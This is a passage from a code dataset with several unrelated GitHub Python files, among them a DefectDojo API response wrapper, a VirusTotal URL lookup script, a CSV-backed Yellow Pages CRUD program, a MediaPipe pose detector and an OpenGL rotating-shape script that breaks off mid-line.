int(key_id)\n # except:\n # data = response.json()\n #\n # return DefectDojoResponse(message=\"Upload complete\", data=data, success=True)\n # elif response.status_code == 204: #Object updates\n # return DefectDojoResponse(message=\"Object updated.\", success=True)\n # elif response.status_code == 400: #Object not created\n # return DefectDojoResponse(message=\"Error occured in API.\", success=False, data=response.text)\n # elif response.status_code == 404: #Object not created\n # return DefectDojoResponse(message=\"Object id does not exist.\", success=False, data=response.text)\n # elif response.status_code == 401:\n # return DefectDojoResponse(message=\"Unauthorized.\", success=False, data=response.text)\n # elif response.status_code == 414:\n # return DefectDojoResponse(message=\"Request-URI Too Large.\", success=False)\n # elif response.status_code == 500:\n # return DefectDojoResponse(message=\"An error 500 occured in the API.\", success=False, data=response.text)\n # else:\n # data = response.json()\n # return DefectDojoResponse(message=\"Success\", data=data, success=True, response_code=response.status_code)\n # except ValueError:\n # return DefectDojoResponse(message='JSON response could not be decoded.', success=False, data=response.text)\n # except requests.exceptions.SSLError:\n # return DefectDojoResponse(message='An SSL error occurred.', success=False)\n # except requests.exceptions.ConnectionError:\n # return DefectDojoResponse(message='A connection error occurred.', success=False)\n # except requests.exceptions.Timeout:\n # return DefectDojoResponse(message='The request timed out after ' + str(self.timeout) + ' seconds.',\n # success=False)\n except requests.exceptions.RequestException:\n return DefectDojoResponse(message='There was an error while handling the request.', success=False)\n\n\n\n\nclass DefectDojoResponse(object):\n \"\"\"\n Container for all DefectDojo API responses, even errors.\n\n \"\"\"\n\n def __init__(self, message, success, data=None, response_code=-1):\n self.message = message\n self.data = data\n self.success = success\n self.response_code = response_code\n\n def __str__(self):\n if self.data:\n return str(self.data)\n else:\n return self.message\n\n def id(self):\n if self.response_code == 400: #Bad Request\n raise ValueError('Object not created:' + json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': ')))\n return int(self.data)\n\n def count(self):\n return self.data[\"meta\"][\"total_count\"]\n\n def data_json(self, pretty=False):\n \"\"\"Returns the data as a valid JSON string.\"\"\"\n if pretty:\n return json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': '))\n else:\n return json.dumps(self.data)\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"doublestraus/secret-finder","sub_path":"notification/defectdojo_old.py","file_name":"defectdojo_old.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"26281593900","text":"\"\"\"Sum of the Others\"\"\"\n\n# sumoftheothers\n\nwhile True:\n try:\n nums = list(map(int, input().split()))\n summary = sum(nums)\n for i, val in enumerate(nums):\n if summary - val == val:\n print(val)\n break\n except EOFError:\n break\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"S/sumoftheothers.py","file_name":"sumoftheothers.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31854407803","text":"from decimal import Decimal\nfrom src import constants\nfrom time import strptime\nfrom datetime import datetime\n\n\nclass Assignment(object):\n\n def __init__(self, name, due_date, category=None, points_earned=None, points_possible=None,\n grade=None, weighted=False):\n\n self.name = name\n self.due_date = due_date\n\n if category:\n self.category = category.title()\n else:\n self.category = None\n\n # if assignment is weighted, its category must be declared\n if weighted:\n self.grade = grade\n self.points_earned = grade\n self.points_possible = 100\n\n # if assignment is unweighted, and points earned and points possible are given\n elif not weighted and points_earned is not None and points_possible is not None:\n self.points_earned = Decimal(points_earned)\n self.points_possible = Decimal(points_possible)\n self.grade = points_earned / points_possible * 100\n\n # if assignment is unweighted, and only points possible are given\n # (meaning the assignment has not been completed)\n elif not weighted and points_possible is not None:\n self.points_earned = None\n self.points_possible = points_possible\n self.grade = None\n\n else:\n raise InvalidAssignment(\"Assignment must contain a valid set of inputs\")\n\n @staticmethod\n def parse_date(date):\n assignment_day = int(date[1])\n assignment_month = strptime(date[0], '%b').tm_mon\n base_year = constants.QUARTERS[0][2].year\n if assignment_month > 8:\n assignment_year = base_year\n else:\n assignment_year = base_year + 1\n return datetime(assignment_year, assignment_month, assignment_day)\n\n def __str__(self):\n return \"Name: {}, Due Date: {}-{}-{}, Grade: {}\".format(self.name,\n self.due_date.year,\n self.due_date.month,\n self.due_date.day,\n self.grade)\n\n\nclass InvalidAssignment(Exception):\n\n def __init__(self, message):\n super(InvalidAssignment, self).__init__(message)","repo_name":"jpackard18/vcgraph","sub_path":"src/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43030133852","text":"\"\"\"Code base runs inside a container and executes based on passed in parameters.\"\"\"\nimport sys\n\nimport vt\n\n\nclass VirusTotalService:\n\n def run(self, argv):\n\n client = vt.Client(argv[0])\n\n url_id = vt.url_id(argv[1])\n url = client.get_object('/urls/{}', url_id)\n\n return_dict = {}\n for item in dir(url):\n if not item.startswith('_'):\n return_dict[item] = getattr(url, item)\n return return_dict\n\n\nif __name__ == \"__main__\":\n print(VirusTotalService().run(sys.argv))\n","repo_name":"MSAdministrator/binocular","sub_path":"src/binocular/containers/virustotal.py","file_name":"virustotal.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41859467195","text":"import csv\nimport pyinputplus as pyip\nimport tabulate\nfrom datetime import datetime\n\ndef readCsv(pathCsv):\n \"\"\"Function to read your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n\n Return:\n db : return your data from database as dictionary data type\n\n Warning:\n pay attention to the number of your columns in database. Need adjusment in updating dictionary data\n \"\"\"\n # Read csv file\n file = open(pathCsv, 'r')\n reader = csv.reader(file, delimiter=';')\n\n # columns\n columns = next(reader)\n\n # make dictionary data type. db as a variable of dictionary data\n db = {'columns':columns}\n for row in reader: # updating dictionary data\n db.update({\n str(row[0]) : [int(row[0]), \n str(row[1]),\n str(row[2]), \n str(row[3]),\n int(row[4]),\n str(row[5])\n ]})\n # close program\n file.close()\n # return the dictionary data\n return db\n\ndef writeCsv(database, pathCsv):\n \"\"\"Function to overwrite your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n database : dictionary data\n \"\"\"\n # Open database in write condition\n file = open(pathCsv, 'w')\n\n # Keep the database up to date\n writer = csv.writer(file, lineterminator='\\n', delimiter=';')\n columns = list(database.values())[0] # termasuk kolom dan data\n data = list(database.values())[1:]\n writer.writerow(columns) #db.values()\n data = list(database.values())[1:]\n for i in data:\n writer.writerow(i)\n # close Program\n file.close() \n\ndef valueInttoStr(intlistData):\n \"\"\"Fungsi untuk mengubah semua item yg berupa integer \n menjadi string yang terdapat di dalam list\n Args:\n intlistData (list): list yang berisi item integer\n \n Returns:\n strChoices: list yang semua value itemnya berubah menjadi string\n \"\"\"\n strChoices = []\n for i in intlistData:\n a = str(i)\n strChoices.append(a)\n return strChoices\n\ndef record(pathRecord):\n \"\"\"Function for showing what user does in the program\n\n Args:\n pathRecord : variable that stored your path of record file\n \"\"\"\n file = open(pathRecord, \"r\")\n print(file.read())\n file.close()\n\n\"\"\"CURD FUNCTION: \n 1. Create : addMenu(arg1,arg2,...)\n 2. Update : updateMenu(arg1,arg2,...)\n 3. Read : readMenu(arg1,arg2,...)\n 4. Delete : deleteMenu(arg1,arg2,...)\n\"\"\"\n\n# Show data function\ndef readMenu(database):\n \"\"\"Function to show your data as tabular format\n\n Args:\n database (dictionary): database yang akan ditampilkan\n \"\"\"\n # 2D list of database from csv file\n data = list(database.values())[1:]\n # select menu inside readMenu:\n while True:\n choices = ['Show all data in database','Show database in detail', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Read Menu:\\n', choices=choices, numbered=True) ## userInput di-return sebagai string\n # If user choose 1st option\n if userInput == 'Show all data in database':\n # if data in database doesnt exist\n if data == []:\n # only display columns without any data\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n # print database in tabular format\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n # If user choose 2nd option\n elif userInput == 'Show database in detail':\n if data == []:\n # only display columns without any data\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n choicesDetail = ['Detail ID', 'businessField', 'City', 'sorted companyName', 'sorted ID']\n inputChoicesDetail = pyip.inputMenu(prompt='Filter or sort data according to the: \\n', choices=choicesDetail, numbered=True)\n # data detailing based on ID\n if inputChoicesDetail == 'Detail ID':\n choices1 = [data[index][0] for index in range(len(data))]\n userInput1 = pyip.inputInt(prompt=\"Which ID do you want to return ?\\n\")\n #userInput1 = pyip.inputInt(prompt='Which ID do you want to return ?\\n', blockRegexes=[r'a-zA-Z'], lessThan=len(data))\n # if ID (index) doesn't exist in database\n if userInput1 not in choices1:\n print('Data does not exist!\\n')\n # else: ID (index) exist in database\n else:\n print(tabulate.tabulate(list([database[str(userInput1)]]), headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n \n # data detailing based on businessField \n elif inputChoicesDetail == 'businessField':\n # Available businessField stored in set data type, hence there's no duplication, then convert into list data type\n businessFieldSet = {data[index][2] for index in range(len(data))}\n businessFieldList = list(businessFieldSet)\n # user choose city\n userInput = pyip.inputMenu(prompt=\"Input the businessField you're looking for\\n\", choices=businessFieldList, numbered=True)\n # find the keys of dictionary data\n keysTarget = [str(i[0]) for i in data if i[2] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # data detailing based on city\n elif inputChoicesDetail == 'City':\n # Available city stored in set data type, hence there's no duplication, the convert into list data type\n citySet = {data[index][3] for index in range(len(data))}\n cityList = list(citySet)\n # user choose city\n userInput = pyip.inputMenu(prompt=\"Input the city you're looking for\\n\", choices=cityList, numbered=True)\n # find the keys of dictionary\n keysTarget = [str(i[0]) for i in data if i[3] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on companyName (A-Z)\n elif inputChoicesDetail == 'sorted companyName':\n # sorted company Name\n companyNameList = [data[index][1] for index in range(len(data))]\n companyNameSort = sorted(companyNameList) # order by companyName A-Z #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in companyNameSort: # compare sorted companyName with 2D list[1] which is companyName of database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[1]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on ID (0-9)\n else:\n # sorted ID\n idList = [data[index][0] for index in range(len(data))]\n idSort = sorted(idList) # order by ID 0-9 #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in idSort: # compare sorted ID with 2D list[0] which is ID of each data in database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[0]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n\n # back to main menu\n else:\n break\n\n\n# add data\ndef addMenu(database, pathRecord):\n \"\"\"Function to add data into your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n\n Return:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n while True:\n choices = ['Menambahkan data Yellow Pages', 'Kembali ke Main Menu']\n userInput = pyip.inputMenu(prompt='Select Add Menu:\\n', choices=choices, numbered=True)\n if userInput == 'Menambahkan data Yellow Pages':\n # check the ID does exist or not ?\n choices1 = [data[index][0] for index in range(len(data))]\n userInputIndex = pyip.inputInt(prompt='Masukkan ID (index) yang ingin ditambahkan: ') # input ID\n # if data already exist, show notification 'Data already exist!'\n if userInputIndex in choices1:\n print('ID already exist!')\n # if ID doesnt exist, you can add to database\n else:\n companyName = pyip.inputStr(prompt='input company name: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n businessField = pyip.inputStr(prompt='input business field: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n city = pyip.inputStr(prompt='input city: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n phoneNumber = pyip.inputInt(prompt='input phone number: ')\n if len(str(phoneNumber)) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\")\n email = pyip.inputEmail(prompt='input email: ')\n \n # display added data in tabular format\n tabularAddedData = [userInputIndex, companyName, businessField, city, phoneNumber, email]\n print(tabulate.tabulate(list([tabularAddedData]), headers=database['columns'], tablefmt=\"github\"))\n\n ## saving menu option\n savingMenuInput = pyip.inputYesNo(prompt='Are you sure want to save the data ? (Yes/No):')\n if savingMenuInput == 'yes':\n database.update(\n {f'{userInputIndex}': [userInputIndex, companyName, businessField, city, phoneNumber, email]})\n \n # show data after added data in database\n data.append(tabularAddedData)\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully saved!'\n print('\\nData successfully saved!\\n')\n \n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(ADD) User has added data with ID number {userInputIndex} at {dt_string}\\n')\n file.close()\n else:\n print('\\nOkey double check your input data!')\n \n # back to Main Menu\n else:\n break\n \n # keep database up to date\n return database\n\n\n# delete data\ndef deleteMenu(database, pathRecord, pathCsv):\n \"\"\"Function to delete data in your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n pathCsv : variable that stored your path of csv file\n \n Returns:\n database: latest database\n \"\"\"\n\n # select delete menu\n while True:\n # read latest database\n readCsv(pathCsv)\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # run sub-delete menu\n choices1 = ['Delete data in Yellow Pages database', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Delete Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Delete data in Yellow Pages database':\n # ensure user how many ID that user want to delete\n userInput1 = pyip.inputChoice(prompt='How many ID that you want to delete ?\\nPlease select one of: one or more than one ? ', \n choices=['one', 'more than one'])\n \n # if user want to delete only one ID\n if userInput1 == 'one':\n userInput2 = pyip.inputInt(prompt='Enter ID that you want to delete in database:')\n if userInput2 in choices:\n # display data that you want to delete in tabular format\n print(tabulate.tabulate(list([database[str(userInput2)]]), headers=database['columns'], tablefmt=\"github\"))\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? (Yes/No):')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n del database[str(userInput2)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # run writeCsv function\n writeCsv(database, pathCsv)\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(DELETE) User has deleted data with ID number {userInput2} at {dt_string}\\n')\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n else:\n print(\"ID doesn't exist!\")\n\n # if user want to delete more than one ID\n else:\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices2 = [data[index][0] for index in range(len(data))]\n\n # ensure the user what is the exact amount of ID that user want to delete\n userInput3 = pyip.inputInt(prompt='Specify the exact amount of ID that you want to delete ?\\n', greaterThan=1, lessThan=len(data))\n # store IDs that user want to delete in a variable\n userInput4 = []\n for i in range(userInput3):\n userInput5 = pyip.inputMenu(prompt=f'Enter ID ke-{i+1} that you want to delete: \\nThese are the available ID:\\n', \n choices=valueInttoStr(choices2), lettered=True)\n # in order to showing the data that user want to delete\n userInput4.append(userInput5)\n # Delete the ID from the list of available ID because of ID has been selected, so that the user does not duplicate input \n choices2.remove(int(userInput5))\n\n # display IDs that user want to delete\n displayDeleteData = [database[i] for i in userInput4]\n print(tabulate.tabulate(displayDeleteData, headers=database['columns'], tablefmt=\"github\"))\n\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? (Yes/No):\\n')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n # delete multiple ID\n for i in userInput4:\n del database[str(i)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(DELETE) User has deleted data with ID number {','.join(userInput4)} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n # Back to main menu\n else:\n break\n # keep database up to date\n return database\n\n\n# update data\ndef updateMenu(database, pathRecord):\n \"\"\"Functio to update certain column and ID of your data in database\n\n Args:\n database (dict): databases yang akan diolah\n pathRecord: variable that stored your path of record file\n \n Returns:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # select update menu\n while True:\n choices1 = ['Edit data in Yellow Pages database', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Update Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Edit data in Yellow Pages database':\n userInputIndex = pyip.inputInt(prompt='Which ID do you want to update ?\\n')\n # if userInputIdex does exist in database\n if userInputIndex in choices:\n # show row that user want to update\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n updateMenuInput = pyip.inputYesNo(prompt='\\nDo you want to continue to update the data ? (Yes/No):') \n if updateMenuInput == 'yes':\n # print columns options\n userInputColumn = pyip.inputMenu(prompt='Which column do you want to update ?\\n', choices=database['columns'][1:], numbered=True) # output string\n # if the user selects a column that contains integer data type (phoneNumber)\n if type(database[str(userInputIndex)][database['columns'].index(userInputColumn)]) == int:\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputInt(prompt='Enter new value:')\n if len(str(database[str(userInputIndex)][database['columns'].index(userInputColumn)])) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\") \n # if user choose 'Email' column\n elif userInputColumn == 'Email':\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputEmail(prompt='Enter new valu: ')\n # if the user selects a column that contains string data type\n else:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputStr(prompt='Enter new value:', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # show updated row\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n # Update data or not ?\n updateMenuInput1 = pyip.inputYesNo(prompt='\\nAre you sure want to update the data ? (Yes/No):') \n if updateMenuInput1 == 'yes':\n # show updated database\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully updated!'\n print('\\nData successfully updated!\\n')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(UPDATE) User has updated data with ID number {userInputIndex} in the {userInputColumn} column, then change the value into {database[str(userInputIndex)][database['columns'].index(userInputColumn)]} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check again your input data!\\n') \n # user does not continue to update data\n else:\n print('\\nOkey double check your input data!')\n # if ID doesnt exist \n else:\n print(\"The data you're looking for doesn't exist\\n\")\n # Back to main Menu\n else:\n break\n\n # keep database up to date\n return database","repo_name":"fnkhairudin/YellowPages","sub_path":"YellowPages.py","file_name":"YellowPages.py","file_ext":"py","file_size_in_byte":23764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37027678433","text":"import mediapipe as mp\r\nimport math\r\nimport cv2\r\n\r\nclass poseDetector():\r\n def __init__(self,\r\n staticMode=False,\r\n model_complexity=False,\r\n smooth=True,\r\n minDetectionCon=0.5,\r\n minTrackCon=0.5):\r\n\r\n self.staticMode = staticMode\r\n self.modelComplexity = model_complexity\r\n self.smooth = smooth\r\n self.minDetectionCon = minDetectionCon\r\n self.minTrackCon = minTrackCon\r\n\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpPose = mp.solutions.pose\r\n self.pose = self.mpPose.Pose(static_image_mode=self.staticMode, model_complexity=self.modelComplexity,\r\n smooth_landmarks=self.smooth,\r\n min_detection_confidence=self.minDetectionCon,\r\n min_tracking_confidence=self.minTrackCon)\r\n self.drawLandmarkSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, circle_radius=2, color=(255,0,0))\r\n self.drawConnectionSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, color=(34,247,10))\r\n\r\n\r\n def find_Person(self, frame, draw=True):\r\n self.imgRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n self.results = self.pose.process(self.imgRGB)\r\n if self.results.pose_landmarks and draw:\r\n self.mpDraw.draw_landmarks(frame, self.results.pose_landmarks,\r\n self.mpPose.POSE_CONNECTIONS, self.drawLandmarkSpec, self.drawConnectionSpec)\r\n return frame\r\n\r\n def find_landmarks(self, frame, draw=True):\r\n self.landmark_list=[]\r\n if self.results.pose_landmarks:\r\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\r\n h,w,c = frame.shape\r\n cx, cy = int(lm.x * w), int(lm.y * h)\r\n self.landmark_list.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(frame, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\r\n return self.landmark_list\r\n\r\n def find_angle(self, frame, p1, p2, p3, draw=True):\r\n # Get the landmarks\r\n x1, y1 = self.landmark_list[p1][1:]\r\n x2, y2 = self.landmark_list[p2][1:]\r\n x3, y3 = self.landmark_list[p3][1:]\r\n # Calculate the Angle\r\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\r\n math.atan2(y1 - y2, x1 - x2))\r\n if angle < 0:\r\n angle += 360\r\n print(\"ANGLE\")\r\n print(angle)\r\n\r\n # Draw\r\n if draw:\r\n cv2.line(frame, (x1, y1), (x2, y2), (255, 255, 255), 5)\r\n cv2.line(frame, (x3, y3), (x2, y2), (255, 255, 255), 5)\r\n cv2.circle(frame, (x1, y1), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x1, y1), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x2, y2), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x3, y3), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x3, y3), 16, (255, 60, 0), 2)\r\n\r\n cv2.putText(frame, str(int(angle)), (x3 - 50, y3 + 60),\r\n cv2.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 1)\r\n return angle\r\n\r\ndef main():\r\n cap = cv2.VideoCapture('TrainerData/curls.mp4')\r\n detector = poseDetector()\r\n while True:\r\n success, frame = cap.read()\r\n #frame = cv2.imread(\"TrainerData/bicep_curls.jpeg\")\r\n frame = detector.find_Person(frame)\r\n landmark_list = detector.find_landmarks(frame, draw=True)\r\n print(landmark_list)\r\n if len(landmark_list) != 0:\r\n print(landmark_list[16])\r\n cv2.circle(\r\n frame, (landmark_list[16][1], landmark_list[16][2]), 15, (0, 0, 255), cv2.FILLED)\r\n\r\n cv2.imshow(\"Image\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"alazimariff/pythonAiTrainer","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27272030292","text":"from OpenGL.GL import *\nfrom curs.constants import *\nfrom PIL import Image\nimport numpy\n\nW = 0.2\nN = 6\n\nV = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n\nT_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n]\n\nQ_PLANES = [\n (V[0], V[3], V[8], V[5]), # 1\n (V[0], V[1], V[6], V[5]), # 2\n (V[1], V[2], V[7], V[6]), # 3\n (V[2], V[3], V[8], V[7]), # 4\n]\n\n\nclass NotConvex:\n\n def __init__(self):\n self.t = 0.0\n self.is_rotated = False\n self.rotation_times = 0\n self.change_direction_times = 0\n self.unit = 1\n self.update(self.unit)\n self.rotation_limit = N\n\n def draw(self):\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, WHITE)\n if not self.is_rotated:\n if self.rotation_times == N or self.rotation_times == N * 2:\n self.change_direction()\n self.rotate(self.unit)\n else:\n self.update(self.unit)\n # glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glBegin(GL_TRIANGLES)\n for plane in T_PLANES:\n for vertex in plane:\n D = numpy.sqrt(pow(vertex[0], 2) + pow(vertex[1], 2) + pow(vertex[2], 2))\n normale_x = vertex[0] - V[4][0]\n normale_y = vertex[1] - V[4][1]\n normale_z = vertex[2] - V[4][2]\n glNormal3f(normale_x, normale_y, normale_z)\n glVertex3f(vertex[0], vertex[1], vertex[2])\n glEnd()\n\n # glBegin(GL_QUADS)\n # for plane in Q_PLANES:\n # for vertex in plane:\n # print(vertex)\n # glNormal3f(vertex[0], vertex[1], vertex[2])\n # glVertex3f(vertex[0], vertex[1], vertex[2])\n # glEnd()\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, (0, 0, 0, 0))\n\n def position(self, t=0):\n self.t = t\n\n def change_direction(self):\n self.change_direction_times += 1\n self.rotation_times = 1\n self.is_rotated = False\n self.unit += 1\n\n def rotate(self, unit):\n if unit == 1:\n self.rotateXY()\n if unit == 2:\n self.rotateYZ()\n if unit == 3:\n self.rotateXY2()\n\n def rotateXY(self, direction=1):\n x0 = V[5][0]\n y0 = V[5][1]\n for i in range(len(V)):\n if (i == 5 or i == 6):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n new_angle = angle + self.t\n # if i == 0 and angle >= numpy.pi / 2:\n # self.t += 0.005 * (self.unit * self.rotation_limit + self.rotation_times)\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_x = x0 + direction * R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateXY2(self):\n x0 = V[8][0]\n y0 = V[8][1]\n for i in range(len(V)):\n if (i == 8 or i == 7):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n if i == 0 and angle <= 2 * numpy.pi / 3:\n self.t += 0.05\n new_angle = angle - self.t\n if new_angle <= 0:\n self.is_rotated = True\n break\n new_x = x0 + R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateYZ(self):\n y0 = V[8][1]\n z0 = V[8][2]\n for i in range(len(V)):\n if (i == 5 or i == 8):\n continue\n vertex = V[i]\n y = vertex[1]\n z = vertex[2]\n R = numpy.sqrt(pow(y - y0, 2) + pow(z - z0, 2))\n angle = numpy.arccos((z0 - z) / R)\n if i == 0 and angle >= numpy.pi / 3:\n self.t += 0.01\n new_angle = angle + self.t\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_y = y0 + R * numpy.sin(new_angle)\n new_z = z0 - R * numpy.cos(new_angle)\n vertex[1] = new_y\n vertex[2] = new_z\n\n def update(self, unit):\n global V\n global 